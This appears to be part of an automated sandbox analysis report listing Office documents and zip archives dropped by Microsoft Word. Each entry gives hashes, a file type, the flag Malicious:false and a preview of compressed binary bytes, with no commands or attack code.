                                                      Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:D676DE8877ACEB43EF0ED570A2B30F0E
                                                      SHA1:6C8922697105CEC7894966C9C5553BEB64744717
                                                      SHA-256:DF012D101DE808F6CD872DFBB619B16732C23CF4ABC64149B6C3CE49E9EFDA01
                                                      SHA-512:F40BADA680EA5CA508947290BA73901D78DE79EAA10D01EAEF975B80612D60E75662BDA542E7F71C2BBA5CA9BA46ECAFE208FD6E40C1F929BB5E407B10E89FBD
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:C276F590BB846309A5E30ADC35C502AD
                                                      SHA1:CA6D9D6902475F0BE500B12B7204DD1864E7DD02
                                                      SHA-256:782996D93DEBD2AF9B91E7F529767A8CE84ACCC36CD62F24EBB5117228B98F58
                                                      SHA-512:B85165C769DFE037502E125A04CFACDA7F7CC36184B8D0A54C1F9773666FFCC43A1B13373093F97B380871571788D532DEEA352E8D418E12FD7AAD6ADB75A150
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK..........1AE,.{E...#P......[Content_Types].xml..Mo.0.....Z..N7.=l......V0.-o..j?...H..sa......./UCb.'...r...w.i..e..<[....{2..U.m..N.{...r.....3.fj.o......2.*....;.L.6..&,D.Cld8...a.gZf.......r-v..><....~/......|Zk.......a.R&.d.(.$..6..}.:.....3......1..[.p.....?..+....R...y,.fod.....e...-.|..#..]j....n:...f...-J...i.^.:Y....T..........m^..~GNp../e}...N....a..5.d.8YcN..5.d.8Y...7..A..e...7Q."3...../.sL._...v...n..b..2].v....n.t....Z...Uk...j.&.Z....im|.r....B.....7DaBuN.... ...>..>..>..>..>..>..>.........V}-.....Q}#.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7FaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}..&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b....7EaBuN.... ...>..>..>..>..>..>..>.........V}-...Q}3.&T..j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..i.o.,-k..b.\}..)...A.......[..PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...........84P....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:CDF98D6B111CF35576343B962EA5EEC6
                                                      SHA1:D481A70EC9835B82BD6E54316BF27FAD05F13A1C
                                                      SHA-256:E3F108DDB3B8581A7A2290DD1E220957E357A802ECA5B3087C95ED13AD93A734
                                                      SHA-512:95C352869D08C0FE903B15311622003CB4635DE8F3A624C402C869F1715316BE2D8D9C0AB58548A84BBB32757E5A1F244B1014120543581FDEA7D7D9D502EF9C
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:B30D2EF0FC261AECE90B62E9C5597379
                                                      SHA1:4893C5B9BE04ECBB19EE45FFCE33CA56C7894FE3
                                                      SHA-256:BB170D6DE4EE8466F56C93DC26E47EE8A229B9C4842EA8DD0D9CCC71BC8E2976
                                                      SHA-512:2E728408C20C3C23C84A1C22DB28F0943AAA960B4436F8C77570448D5BEA9B8D53D95F7562883FA4F9B282DFE2FD07251EEEFDE5481E49F99B8FEDB66AAAAB68
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........V'B.._<....-.......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:97EEC245165F2296139EF8D4D43BBB66
                                                      SHA1:0D91B68CCB6063EB342CFCED4F21A1CE4115C209
                                                      SHA-256:3C5CF7BDB27592791ADF4E7C5A09DDE4658E10ED8F47845064DB1153BE69487C
                                                      SHA-512:8594C49CAB6FF8385B1D6E174431DAFB0E947A8D7D3F200E622AE8260C793906E17AA3E6550D4775573858EA1243CCBF7132973CD1CF7A72C3587B9691535FF8
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK..........1AS'......ip......[Content_Types].xml..n.@.._......8ie'......}.......(y...H}......3Fi..%2.v?..3..._...d=..E.g.....7.i.-.t5.6......}}.m9r.......m...ML.g.M.eV$.r..*.M..l0...A...M..j;.w={o.f..F....i..v......5..d;..D.ySa...M&..qd*w>.O.{h...|w..5.]..'.CS<.:8C}.g.|E.../..>..].Tnml..I.......r.Gv.E....7.;.E......4/l.....6.K.C?1qz.O.v_..r......\c.c.>..lS........X.N.3N.sN..N.)'.%'..'..N.pL.E...T.!..CR....Ie..k.o..M..w.B.0}..3....v..+....,.q..pz.......v{.;....s3.|..V..ZZ......0.[.....x.....!.!~.8.e..n..&.}p....s.i.. ..[]...q.r....~..+.A\...q............e.-)h9..."Z.>...5-C..`..g.}........r.A.+..\...r.>.... .W.\...re?..%.-/hiA..ZR.r.W.D.\}.EK..kZ.>......5..9.&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^h....L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i..`..G..j..).&T......Wlu.b....}..+.A\...q......~.WK.Z^..........>.h..`......}.....^j..K.L...H...!...r.>... .W...\...rE?............-+hIA..\}..r...-}..i.
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:F03AB824395A8F1F1C4F92763E5C5CAD
                                                      SHA1:A6E021918C3CEFFB6490222D37ECEED1FC435D52
                                                      SHA-256:D96F7A63A912CA058FB140138C41DCB3AF16638BA40820016AF78DF5D07FAEDD
                                                      SHA-512:0241146B63C938F11045FB9DF5360F63EF05B9B3DD1272A3E3E329A1BFEC5A4A645D5472461DE9C06CFE4ADB991FE96C58F0357249806C341999C033CD88A7AF
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK..........1A.......F`......[Content_Types].xml..n.@.._.y.ac $..,........-..g@.u.G.+t.:........D1...itgt>...k..lz;].8Kg^....N.l..........0.~}....ykk.A`..N..\...2+.e.c..r..P+....I.e.......|.^/.vc{......s..z....f^...8...'.zcN&.<....}.K.'h..X..y.c.qnn.s%...V('~v.W.......I%nX`.....G.........r.Gz.E..M.."..M....6n.a..V.K6.G?Qqz..............\e.K.>..lkM...`...k.5...sb.rbM8..8..9..pb..R..{>$..C.>......X..iw.'..a.09CPk.n...v....5n..Uk\...SC...j.Y.....Vq..vk>mi......z..t....v.]...n...e(.....s.i......]...q.r....~.WV/.j.Y......K..-.. Z..@.\.P..W...A..X8.`$C.F(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........c..0F...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP..........(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-.............0A...@Z.....v.+.A\...q.......ZAV'p)...R.D....K..-...h....eP.........w(.P..H...W..r.>... .W.C..zAV+.....@.\..h....r)...R..-..........T..GI..~.....~....PK..........1A.s@.....O......._rels/.rels...J.
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:FD5BBC58056522847B3B75750603DF0C
                                                      SHA1:97313E85C0937739AF7C7FC084A10BF202AC9942
                                                      SHA-256:44976408BD6D2703BDBE177259061A502552193B1CD05E09B698C0DAC3653C5F
                                                      SHA-512:DBD72827044331215A7221CA9B0ECB8809C7C79825B9A2275F3450BAE016D7D320B4CA94095F7CEF4372AC63155C78CA4795E23F93166D4720032ECF9F932B8E
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK..........1A..d T....P......[Content_Types].xml..Ms.@.....!...=.7....kX 5o.,L..<..........d..g/..dw.]...C...9...#g/."L..;...#. ]..f...w../._.3Y8..X.[..7._.[...K3..3.4......D.]l.?...~.&J&...s...;...H9...e.3.q.....k-.0>Lp:.7..eT...Y...P...OVg.....G..).aV...\Z.x...W.>f...oq.8.....I?Ky...g..."...J?....A$zL.].7.M.^..\....C..d/;.J0.7k.X4.e..?N{....r.."LZx.H?. ......;r.+...A<.;U.....4...!'k...s.&..)'k...d..d......._E..D...o..o...o...f.7;s..]...Uk6d.j..MW....5[C].f#...l;u.M..Z.../iM|...b...s.....0..O.... ...>..>..>..>..>..>..>.........2V}......Q}#.&T...rU....\..\..\..\..\..\..\..\.W..W.^Z....Q}c;.o...>.Z..\.v...............................*Z....K.X.5X8.obG.MP.P.'P.U}.k..rU..rU..rU..rU..rU..rU..rU..rU_EK_}.zi.....G.M.).....j...r..]..CZ..CZ..CZ..CZ..CZ..CZ..CZ..h.oZ/-c..`....7CaBu.@-W.A.]..U}H.U}H.U}H.U}H.U}H.U}H.U}H.U}.-}...e...,...|...].k.........PK..........1A.s@.....O......._rels/.rels...J.1.._%..d...t......}...n2!..}6.>..`(.v...K`2...70...
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:0E37AECABDB3FDF8AAFEDB9C6D693D2F
                                                      SHA1:F29254D2476DF70979F723DE38A4BF41C341AC78
                                                      SHA-256:7AC7629142C2508B070F09788217114A70DE14ACDB9EA30CBAB0246F45082349
                                                      SHA-512:DE6AFE015C1D41737D50ADD857300996F6E929FED49CB71BC59BB091F9DAB76574C56DEA0488B0869FE61E563B07EBB7330C8745BC1DF6305594AC9BDEA4A6BF
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........V'BE,.{....#P......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.~n..Ofu.-..K.e....{..A.~.8.#D..)o.7..........:2........=......f...u....[..}...u.6b...xz.[...G..|#...$....)J./.......7.............oQ..]^.M........wy}7a.....&l................w.......l._...l..?.A..........r..9.|.8.........{w...........n...]^.M........wy}7a.....&l.................`..z..`.....2.o...wx}.....>..c.M..Arr#.....nD..[.....w......n...]^.M........wy}7a.....&l........w........... ..Fp....w_Q....g..tL.i.?H.o...]^..........n...]^.M........wy}7a.....&l.................`..z..`
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:9E563D44C28B9632A7CF4BD046161994
                                                      SHA1:D3DB4E5F5B1CC6DD08BB3EBF488FF05411348A11
                                                      SHA-256:86A70CDBE4377C32729FD6C5A0B5332B7925A91C492292B7F9C636321E6FAD86
                                                      SHA-512:8EB14A1B10CB5C7607D3E07E63F668CFC5FC345B438D39138D62CADF335244952FBC016A311D5CB8A71D50660C49087B909528FC06C1D10AF313F904C06CBD5C
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:ACBA78931B156E4AF5C4EF9E4AB3003B
                                                      SHA1:2A1F506749A046ECFB049F23EC43B429530EC489
                                                      SHA-256:943E4044C40ABA93BD7EA31E8B5EBEBD7976085E8B1A89E905952FA8DAC7B878
                                                      SHA-512:2815D912088BA049F468CA9D65B92F8951A9BE82AB194DBFACCF0E91F0202820F5BC9535966654D28F69A8B92D048808E95FEA93042D8C5DEA1DCB0D58BE5175
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:EE33FDA08FBF10EF6450B875717F8887
                                                      SHA1:7DFA77B8F4559115A6BF186EDE51727731D7107D
                                                      SHA-256:5CF611069F281584DE3E63DE8B99253AA665867299DC0192E8274A32A82CAA20
                                                      SHA-512:AED6E11003AAAACC3FB28AE838EDA521CB5411155063DFC391ACE2B9CBDFBD5476FAB2B5CC528485943EBBF537B95F026B7B5AB619893716F0A91AEFF076D885
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........{MBS'..t...ip......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`.../.|u1..Y.....nK.......u=..2.tu~^L.Y5]/...~+.v...o....j.`?.S...../.by.|..>."kZbs....H.9..m.z.]W.V.?~v........;...N.......w....;.z..N.......w.....R.._..w._..w._..w._..w._..w._..w.n..Ofu.-..K.e........T..q.F...R[...~.u.....Z..F....7.?.v....5O....zot..i.....b...^...Z...V...R...N...r./.?........=....#.`..\~n.n...)J./.......7........+......Q..]n............w......Ft........|......b...^...Z...V...R...N..W<x......l._...l..?.A......x....x.9.|.8..............u................w#.....nD..]...........R.......R.......R........o...].`.....A....#.`..\.....+J./.......7........+......Q..]n.........w9~7......Ft........|......b...^.c..-...-...-
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:529795E0B55926752462CBF32C14E738
                                                      SHA1:E72DFF8354DF2CB6A5698F14BBD1805D72FEEAFF
                                                      SHA-256:8D341D1C24176DC6B67104C2AF90FABD3BFF666CCC0E269381703D7659A6FA05
                                                      SHA-512:A51F440F1E19C084D905B721D0257F7EEE082B6377465CB94E677C29D4E844FD8021D0B6BA26C0907B72B84157C60A3EFEDFD96C16726F6ABEA8D896D78B08CE
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:5AF1581E9E055B6E323129E4B07B1A45
                                                      SHA1:B849F85BCAF0E1C58FA841FFAE3476D20D33F2DD
                                                      SHA-256:BDC9FBF81FBE91F5BF286B2CEA00EE76E70752F7E51FE801146B79F9ADCB8E98
                                                      SHA-512:11BFEF500DAEC099503E8CDB3B4DE4EDE205201C0985DB4CA5EBBA03471502D79D6616D9E8F471809F6F388D7CBB8B0D0799262CBE89FEB13998033E601CEE09
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........{MB.$<.~....p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c...W..G.4D_.}T,.@...}....R.Z..4k.....Y..mEkLor.f^..O..P...`..^.......H^..<}...lA-.D.....lI/...hD.Z....|VM..ze........L..tU...g....lQ....Y...>MI...5-....S......h=..u.h..?;h...@k...h...'Z...D...;.....h=..'Z...D...;.....)^./.../U.../..../U.../..../U..?...'.........Ngz..A.~.8.#D....xot.u.?...eyot.n..{..sk....[......Z..F....l...o)..o..o...oi..o)..o..,..b.s......2.C.z.~8.......f......x.9.|.8..............u................r.nD..]...........w.~7...-...-...-...-...-...-....x.&l........>.4.z.~8..........=E....As.1..q. 9....w.7...1........w.}7......Ft...................o)..o..o...oi..o)..o..w.7a...x0...........d0..............A.......Fl.............Ft................w#...r.nD..]..M...K1.0..7....
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:5BDE450A4BD9EFC71C370C731E6CDF43
                                                      SHA1:5B223FB902D06F9FCC70C37217277D1E95C8F39D
                                                      SHA-256:93BFC6AC1DC1CFF497DF92B30B42056C9D422B2321C21D65728B98E420D4ED50
                                                      SHA-512:2365A9F76DA07D705A6053645FD2334D707967878F930061D451E571D9228C74A8016367525C37D09CB2AD82261B4B9E7CAEFBA0B96CE2374AC1FAC6B7AB5123
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:FB88BFB743EEA98506536FC44B053BD0
                                                      SHA1:B27A67A5EEC1B5F9E7A9C3B76223EDE4FCAF5537
                                                      SHA-256:05057213BA7E5437AC3B8E9071A5577A8F04B1A67EFE25A08D3884249A22FBBF
                                                      SHA-512:4270A19F4D73297EEC910B81FF17441F3FC7A6A2A84EBA2EA3F7388DD3AA0BA31E9E455CFF93D0A34F4EC7CA74672D407A1C4DC838A130E678CA92A2E085851C
                                                      Malicious:false
                                                      Reputation:unknown
                                                      Preview:PK.........{MB.f}......p......[Content_Types].xml..`.I.%&/m.{.J.J..t...`.$.@........iG#).*..eVe]f.@....{...{...;.N'...?\fd.l..J..!....?~|.?"....|.{.[..e^7E......Gi..V.by..G..|.......U..t.|..mW...m..|.5.j./..^d-.Y_.]e..E~wog...j...v......?..u....c.v...(=.v........F_..U..G...T.e.y)[..b.......3.m....6.X5.P........_...b../..}.-......~.-..z..d.......j.^.+c..E.V..~3}..U.7..~p.>.E..9^d....4%}.E.$....N..r....<....%...%.?....w.u...h........D...w.....h........Dkw...x..T....T....T....T....T....T....j...."[.J.....;..!4...M...............t.n-.{..skp...[;.......F...j.7...4fC...K1..K/..K-..K+..K)..K'..f9......Fl._.........d0...?7K7].........A.......Fl.............Ft....u.......Ft........\.......w....R.......R.......R........o...].`.....A....#.`..\.....S.._...4...o.........W<x#..............w#...r.nD..]....\.~....|......b...^...Z...V...R...N..W<x......l._...l..?.A......xp_Q..y<h..tL.i.?HNn...]..........r.nD..]~.........wy~7......Ft...........E/|c.
                                                      Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                      File Type:Microsoft OOXML
                                                      Category:dropped
                                                      Size (bytes):0
                                                      Entropy (8bit):0.0
                                                      Encrypted:false
                                                      SSDEEP:
                                                      MD5:2192871A20313BEC581B277E405C6322
                                                      SHA1:1F9A6A5E10E1C3FFEB6B6725C5D2FA9ECDF51085
                                                      SHA-256:A06B302954A4C9A6A104A8691864A9577B0BFEA240B0915D9BEA006E98CDFFEC
                                                      SHA-512:6D8844D2807BB90AEA6FE0DDDB9C67542F587EC9B7FC762746164B2D4A1A99EF8368A70C97BAD7A986AAA80847F64408F50F4707BB039FCCC509133C231D53B9
